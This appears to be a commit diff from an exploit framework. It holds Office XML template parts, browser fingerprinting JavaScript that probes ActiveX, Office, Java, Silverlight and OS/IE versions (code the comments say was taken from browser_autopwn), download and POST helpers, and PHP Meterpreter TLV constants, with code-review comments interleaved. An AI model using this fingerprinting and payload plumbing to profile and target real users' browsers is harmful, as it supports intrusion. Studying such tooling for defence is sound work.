<w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Bibliography" w:uiPriority="37"/>
<w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
</w:latentStyles>
<w:style w:type="paragraph" w:default="1" w:styleId="Normal">
<w:name w:val="Normal"/>
<w:qFormat/>
<w:rsid w:val="00063BF6"/>
</w:style>
<w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
<w:name w:val="Default Paragraph Font"/>
<w:uiPriority w:val="1"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
</w:style>
<w:style w:type="table" w:default="1" w:styleId="TableNormal">
<w:name w:val="Normal Table"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
<w:qFormat/>
<w:tblPr>
<w:tblInd w:w="0" w:type="dxa"/>
<w:tblCellMar>
<w:top w:w="0" w:type="dxa"/>
<w:left w:w="108" w:type="dxa"/>
<w:bottom w:w="0" w:type="dxa"/>
<w:right w:w="108" w:type="dxa"/>
</w:tblCellMar>
</w:tblPr>
</w:style>
<w:style w:type="numbering" w:default="1" w:styleId="NoList">
<w:name w:val="No List"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
</w:style>
<w:style w:type="paragraph" w:styleId="BalloonText">
<w:name w:val="Balloon Text"/>
<w:basedOn w:val="Normal"/>
<w:link w:val="BalloonTextChar"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
<w:rsid w:val="00CD271A"/>
<w:pPr>
<w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
</w:pPr>
<w:rPr>
<w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
<w:sz w:val="16"/>
<w:szCs w:val="16"/>
</w:rPr>
</w:style>
<w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
<w:name w:val="Balloon Text Char"/>
<w:basedOn w:val="DefaultParagraphFont"/>
<w:link w:val="BalloonText"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:rsid w:val="00CD271A"/>
<w:rPr>
<w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
<w:sz w:val="16"/>
<w:szCs w:val="16"/>
</w:rPr>
</w:style>
</w:styles>


@ -0,0 +1,283 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
<a:themeElements>
<a:clrScheme name="Office">
<a:dk1>
<a:sysClr val="windowText" lastClr="000000"/>
</a:dk1>
<a:lt1>
<a:sysClr val="window" lastClr="FFFFFF"/>
</a:lt1>
<a:dk2>
<a:srgbClr val="1F497D"/>
</a:dk2>
<a:lt2>
<a:srgbClr val="EEECE1"/>
</a:lt2>
<a:accent1>
<a:srgbClr val="4F81BD"/>
</a:accent1>
<a:accent2>
<a:srgbClr val="C0504D"/>
</a:accent2>
<a:accent3>
<a:srgbClr val="9BBB59"/>
</a:accent3>
<a:accent4>
<a:srgbClr val="8064A2"/>
</a:accent4>
<a:accent5>
<a:srgbClr val="4BACC6"/>
</a:accent5>
<a:accent6>
<a:srgbClr val="F79646"/>
</a:accent6>
<a:hlink>
<a:srgbClr val="0000FF"/>
</a:hlink>
<a:folHlink>
<a:srgbClr val="800080"/>
</a:folHlink>
</a:clrScheme>
<a:fontScheme name="Office">
<a:majorFont>
<a:latin typeface="Cambria"/>
<a:ea typeface=""/>
<a:cs typeface=""/>
<a:font script="Jpan" typeface=" ゴシック"/>
<a:font script="Hang" typeface="맑은 고딕"/>
<a:font script="Hans" typeface="宋体"/>
<a:font script="Hant" typeface="新細明體"/>
<a:font script="Arab" typeface="Times New Roman"/>
<a:font script="Hebr" typeface="Times New Roman"/>
<a:font script="Thai" typeface="Angsana New"/>
<a:font script="Ethi" typeface="Nyala"/>
<a:font script="Beng" typeface="Vrinda"/>
<a:font script="Gujr" typeface="Shruti"/>
<a:font script="Khmr" typeface="MoolBoran"/>
<a:font script="Knda" typeface="Tunga"/>
<a:font script="Guru" typeface="Raavi"/>
<a:font script="Cans" typeface="Euphemia"/>
<a:font script="Cher" typeface="Plantagenet Cherokee"/>
<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
<a:font script="Tibt" typeface="Microsoft Himalaya"/>
<a:font script="Thaa" typeface="MV Boli"/>
<a:font script="Deva" typeface="Mangal"/>
<a:font script="Telu" typeface="Gautami"/>
<a:font script="Taml" typeface="Latha"/>
<a:font script="Syrc" typeface="Estrangelo Edessa"/>
<a:font script="Orya" typeface="Kalinga"/>
<a:font script="Mlym" typeface="Kartika"/>
<a:font script="Laoo" typeface="DokChampa"/>
<a:font script="Sinh" typeface="Iskoola Pota"/>
<a:font script="Mong" typeface="Mongolian Baiti"/>
<a:font script="Viet" typeface="Times New Roman"/>
<a:font script="Uigh" typeface="Microsoft Uighur"/>
<a:font script="Geor" typeface="Sylfaen"/>
</a:majorFont>
<a:minorFont>
<a:latin typeface="Calibri"/>
<a:ea typeface=""/>
<a:cs typeface=""/>
<a:font script="Jpan" typeface=" 明朝"/>
<a:font script="Hang" typeface="맑은 고딕"/>
<a:font script="Hans" typeface="宋体"/>
<a:font script="Hant" typeface="新細明體"/>
<a:font script="Arab" typeface="Arial"/>
<a:font script="Hebr" typeface="Arial"/>
<a:font script="Thai" typeface="Cordia New"/>
<a:font script="Ethi" typeface="Nyala"/>
<a:font script="Beng" typeface="Vrinda"/>
<a:font script="Gujr" typeface="Shruti"/>
<a:font script="Khmr" typeface="DaunPenh"/>
<a:font script="Knda" typeface="Tunga"/>
<a:font script="Guru" typeface="Raavi"/>
<a:font script="Cans" typeface="Euphemia"/>
<a:font script="Cher" typeface="Plantagenet Cherokee"/>
<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
<a:font script="Tibt" typeface="Microsoft Himalaya"/>
<a:font script="Thaa" typeface="MV Boli"/>
<a:font script="Deva" typeface="Mangal"/>
<a:font script="Telu" typeface="Gautami"/>
<a:font script="Taml" typeface="Latha"/>
<a:font script="Syrc" typeface="Estrangelo Edessa"/>
<a:font script="Orya" typeface="Kalinga"/>
<a:font script="Mlym" typeface="Kartika"/>
<a:font script="Laoo" typeface="DokChampa"/>
<a:font script="Sinh" typeface="Iskoola Pota"/>
<a:font script="Mong" typeface="Mongolian Baiti"/>
<a:font script="Viet" typeface="Arial"/>
<a:font script="Uigh" typeface="Microsoft Uighur"/>
<a:font script="Geor" typeface="Sylfaen"/>
</a:minorFont>
</a:fontScheme>
<a:fmtScheme name="Office">
<a:fillStyleLst>
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:tint val="50000"/>
<a:satMod val="300000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="35000">
<a:schemeClr val="phClr">
<a:tint val="37000"/>
<a:satMod val="300000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:tint val="15000"/>
<a:satMod val="350000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:lin ang="16200000" scaled="1"/>
</a:gradFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:shade val="51000"/>
<a:satMod val="130000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="80000">
<a:schemeClr val="phClr">
<a:shade val="93000"/>
<a:satMod val="130000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:shade val="94000"/>
<a:satMod val="135000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:lin ang="16200000" scaled="0"/>
</a:gradFill>
</a:fillStyleLst>
<a:lnStyleLst>
<a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
<a:solidFill>
<a:schemeClr val="phClr">
<a:shade val="95000"/>
<a:satMod val="105000"/>
</a:schemeClr>
</a:solidFill>
<a:prstDash val="solid"/>
</a:ln>
<a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:prstDash val="solid"/>
</a:ln>
<a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:prstDash val="solid"/>
</a:ln>
</a:lnStyleLst>
<a:effectStyleLst>
<a:effectStyle>
<a:effectLst>
<a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0">
<a:srgbClr val="000000">
<a:alpha val="38000"/>
</a:srgbClr>
</a:outerShdw>
</a:effectLst>
</a:effectStyle>
<a:effectStyle>
<a:effectLst>
<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
<a:srgbClr val="000000">
<a:alpha val="35000"/>
</a:srgbClr>
</a:outerShdw>
</a:effectLst>
</a:effectStyle>
<a:effectStyle>
<a:effectLst>
<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
<a:srgbClr val="000000">
<a:alpha val="35000"/>
</a:srgbClr>
</a:outerShdw>
</a:effectLst>
<a:scene3d>
<a:camera prst="orthographicFront">
<a:rot lat="0" lon="0" rev="0"/>
</a:camera>
<a:lightRig rig="threePt" dir="t">
<a:rot lat="0" lon="0" rev="1200000"/>
</a:lightRig>
</a:scene3d>
<a:sp3d>
<a:bevelT w="63500" h="25400"/>
</a:sp3d>
</a:effectStyle>
</a:effectStyleLst>
<a:bgFillStyleLst>
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:tint val="40000"/>
<a:satMod val="350000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="40000">
<a:schemeClr val="phClr">
<a:tint val="45000"/>
<a:shade val="99000"/>
<a:satMod val="350000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:shade val="20000"/>
<a:satMod val="255000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:path path="circle">
<a:fillToRect l="50000" t="-80000" r="50000" b="180000"/>
</a:path>
</a:gradFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:tint val="80000"/>
<a:satMod val="300000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:shade val="30000"/>
<a:satMod val="200000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:path path="circle">
<a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
</a:path>
</a:gradFill>
</a:bgFillStyleLst>
</a:fmtScheme>
</a:themeElements>
<a:objectDefaults/>
<a:extraClrSchemeLst/>
</a:theme>


@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:optimizeForBrowser/>
</w:webSettings>

Binary file not shown.

Binary file not shown.

Binary file not shown.


@ -1,9 +1,47 @@
window.addons_detect = { };
window.ie_addons_detect = { };
/**
* Returns true if this ActiveX is available, otherwise false.
* Grabbed this directly from browser_autopwn.rb
**/
window.ie_addons_detect.hasActiveX = function (axo_name, method) {
var axobj = null;
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
axobj = document.createElement("object");
axobj.setAttribute("classid", "clsid:" + axo_name);
axobj.setAttribute("id", axo_name);
axobj.setAttribute("style", "visibility: hidden");
axobj.setAttribute("width", "0px");
axobj.setAttribute("height", "0px");
document.body.appendChild(axobj);
if (typeof(axobj[method]) == 'undefined') {
var attributes = 'id="' + axo_name + '"';
attributes += ' classid="clsid:' + axo_name + '"';
attributes += ' style="visibility: hidden"';
attributes += ' width="0px" height="0px"';
document.body.innerHTML += "<object " + attributes + "></object>";
axobj = document.getElementById(axo_name);
}
} else {
try {
axobj = new ActiveXObject(axo_name);
} catch(e) {
// If we can't build it with an object tag and we can't build it
// with ActiveXObject, it can't be built.
return false;
};
}
if (typeof(axobj[method]) != 'undefined') {
return true;
}
return false;
};
/**
* Returns the version of Microsoft Office. If not found, returns null.
**/
window.addons_detect.getMsOfficeVersion = function () {
window.ie_addons_detect.getMsOfficeVersion = function () {
var version;
var types = new Array();
for (var i=1; i <= 5; i++) {
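Review bot: In `hasActiveX`, the fallback `document.body.innerHTML += "<object " + attributes + "></object>";` serialises and re-parses the whole body, which drops event handlers and references held on existing nodes, and it leaves two elements with the same `id` because the first `<object>` was already appended. Removing the first element and using `document.body.insertAdjacentHTML("beforeend", "<object " + attributes + "></object>");` keeps the markup-based retry without touching the rest of the page. `axo_name` is concatenated into markup unescaped, so the doc comment should state that it must be a fixed CLSID or ProgID string. The section also renames `window.addons_detect` to `window.ie_addons_detect`; callers are not visible here and presumably need the same rename.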


@ -0,0 +1,110 @@
window.misc_addons_detect = { };
/**
* Detects whether the browser supports Silverlight or not
**/
window.misc_addons_detect.hasSilverlight = function () {
var found = false;
//
// When on IE, we can use AgControl.AgControl to actually detect the version too.
// But this ability is specific to IE, so we fall back to just true/false response
//
try {
var ax = new ActiveXObject('AgControl.AgControl');
found = true;
} catch(e) {}
//
// ActiveX didn't get anything, try looking in MIMEs
//
if (!found) {
var mimes = window.navigator.mimeTypes;
for (var i=0; i < mimes.length; i++) {
if (/x\-silverlight/.test(mimes[i].type)) {
found = true;
break;
}
}
}
//
// MIMEs didn't work either. Try navigator.
//
if (!found) {
var count = navigator.plugins.length;
for (var i=0; i < count; i++) {
var pluginName = navigator.plugins[i].name;
if (/Silverlight Plug\-In/.test(pluginName)) {
found = true;
break;
}
}
}
return found;
}
/**
* Returns the Java version
**/
window.misc_addons_detect.getJavaVersion = function () {
var foundVersion = null;
//
// This finds the Java version from Java WebStart's ActiveX control
// This is specific to Windows
//
for (var i1=0; i1 < 10; i1++) {
for (var i2=0; i2 < 10; i2++) {
for (var i3=0; i3 < 10; i3++) {
for (var i4=0; i4 < 10; i4++) {
var version = String(i1) + "." + String(i2) + "." + String(i3) + "." + String(i4);
var progId = "JavaWebStart.isInstalled." + version;
try {
new ActiveXObject(progId);
return version;
}
catch (e) {
continue;
}
}}}}
//
// This finds the Java version from window.navigator.mimeTypes
// This seems to work pretty well for most browsers except for IE
//
if (foundVersion == null) {
var mimes = window.navigator.mimeTypes;
for (var i=0; i<mimes.length; i++) {
var m = /java.+;version=(.+)/.exec(mimes[i].type);
if (m) {
var version = parseFloat(m[1]);
if (version > foundVersion) {
foundVersion = version;
}
}
}
}
//
// This finds the Java version from navigator plugins
// This is necessary for Windows + Firefox setup, but the check isn't as good as the mime one.
// So we do this last.
//
if (foundVersion == null) {
var foundJavaString = "";
var pluginsCount = navigator.plugins.length;
for (i=0; i < pluginsCount; i++) {
var pluginName = navigator.plugins[i].name;
var pluginVersion = navigator.plugins[i].version;
if (/Java/.test(pluginName) && pluginVersion != undefined) {
foundVersion = navigator.plugins[i].version;
break;
}
}
}
return foundVersion;
}
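Review bot: `getJavaVersion` returns a different type depending on which probe succeeds: a four-part string built in the ActiveX loop, a number from `parseFloat(m[1])` in the MIME branch (which also discards everything after the first two components), and whatever `navigator.plugins[i].version` holds in the last branch. The header comment `Returns the Java version` should say this, for example `Returns the Java version as a dotted string (ActiveX, plugins) or a float (MIME types), or null if not found`, so callers do not compare the results as one type. `pluginVersion` is read into a local and then `navigator.plugins[i].version` is read again for the assignment; `foundVersion = pluginVersion;` would be the consistent form.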


@ -210,7 +210,11 @@ window.os_detect.getVersion = function(){
// Thanks to developer.mozilla.org "Firefox for developers" series for most
// of these.
// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
if (css_is_valid('background-attachment',
if (css_is_valid('image-orientation',
'imageOrientation',
'0deg')) {
ua_version = '26.0';
} else if (css_is_valid('background-attachment',
'backgroundAttachment',
'local')) {
ua_version = '25.0';
@ -867,6 +871,12 @@ window.os_detect.getVersion = function(){
os_flavor = "7";
os_sp = "SP1";
break;
case "10016720":
// IE 10.0.9200.16721 / Windows 7 SP1
ua_version = "10.0";
os_flavor = "7";
os_sp = "SP1";
break;
case "1000":
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
ua_version = "10.0";
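Review bot: The added `case "10016720":` carries the comment `// IE 10.0.9200.16721 / Windows 7 SP1`, so the case label and the build number in the comment disagree by one. Which of the two is correct cannot be told from the hunk; if the label is meant to correspond to that build string, one of them is a typo and the comment documents a build the case does not match. Both hunks sit inside `window.os_detect.getVersion`, whose body starts and ends outside them.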


@ -1,25 +1,16 @@
function ajax_download(oArg) {
var method = oArg.method;
var path = oArg.path;
var data = oArg.data;
if (!oArg.method) { oArg.method = "GET"; }
if (!oArg.path) { throw "Missing parameter 'path'"; }
if (!oArg.data) { oArg.data = null; }
if (method == undefined) { method = "GET"; }
if (method == path) { throw "Missing parameter 'path'"; }
if (data == undefined) { data = null; }
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest();
}
else {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
var xmlHttp = new XMLHttpRequest();
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open(method, path, false);
xmlHttp.send(data);
xmlHttp.open(oArg.method, oArg.path, false);
xmlHttp.send(oArg.data);
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
return xmlHttp.responseText;
}
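Review bot: The argument checks in `ajax_download` now write defaults back into the caller's object (`oArg.method = "GET"`, `oArg.data = null`), so a caller that reuses `oArg` finds it modified after the call. Reading into locals keeps the call free of that side effect: `var method = oArg.method || "GET";` and `var data = oArg.data || null;`, then `xmlHttp.open(method, oArg.path, false);`. The page prints old and new lines without markers, so this reading of the new side is inferred from the `oArg.`-prefixed lines. The function continues past the end of the hunk.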


@ -0,0 +1,10 @@
function postInfo(path, data) {
var xmlHttp = new XMLHttpRequest();
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open('POST', path, false);
xmlHttp.send(data);
}


@ -0,0 +1,15 @@
if (!window.XMLHTTPRequest) {
(function() {
var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
for (idx = 0; idx < activeObjs.length; idx++) {
try {
new ActiveXObject(activeObjs[idx]);
window.XMLHttpRequest = function() {
return new ActiveXObject(activeObjs[idx]);
};
break;
}
catch (e) {}
}
})();
}
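Review bot: The guard `if (!window.XMLHTTPRequest) {` tests a property name with the wrong capitalisation (`XMLHTTPRequest` rather than `XMLHttpRequest`), so it is always true and the shim body runs even where a native `XMLHttpRequest` exists, replacing it whenever one of the listed ProgIDs can be instantiated. The line should read `if (!window.XMLHttpRequest) {`. A one-line comment above the block saying that it defines `window.XMLHttpRequest` only for browsers without a native one would also help, since other files in this commit call `new XMLHttpRequest()` unconditionally.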

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.


@ -78,6 +78,14 @@ define("TLV_TYPE_VALUE_DATA", TLV_META_TYPE_RAW | 1012);
define("TLV_TYPE_COMPUTER_NAME", TLV_META_TYPE_STRING | 1040);
define("TLV_TYPE_OS_NAME", TLV_META_TYPE_STRING | 1041);
define("TLV_TYPE_USER_NAME", TLV_META_TYPE_STRING | 1042);
define("TLV_TYPE_ARCHITECTURE", TLV_META_TYPE_STRING | 1043);
define("TLV_TYPE_LANG_SYSTEM", TLV_META_TYPE_STRING | 1044);
# Environment
define("TLV_TYPE_ENV_VARIABLE", TLV_META_TYPE_STRING | 1100);
define("TLV_TYPE_ENV_VALUE", TLV_META_TYPE_STRING | 1101);
define("TLV_TYPE_ENV_GROUP", TLV_META_TYPE_GROUP | 1102);
define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
@ -162,7 +170,7 @@ define("ERROR_CONNECTION_ERROR", 10000);
# eval'd twice
my_print("Evaling stdapi");
##
##
# Search Helpers
##
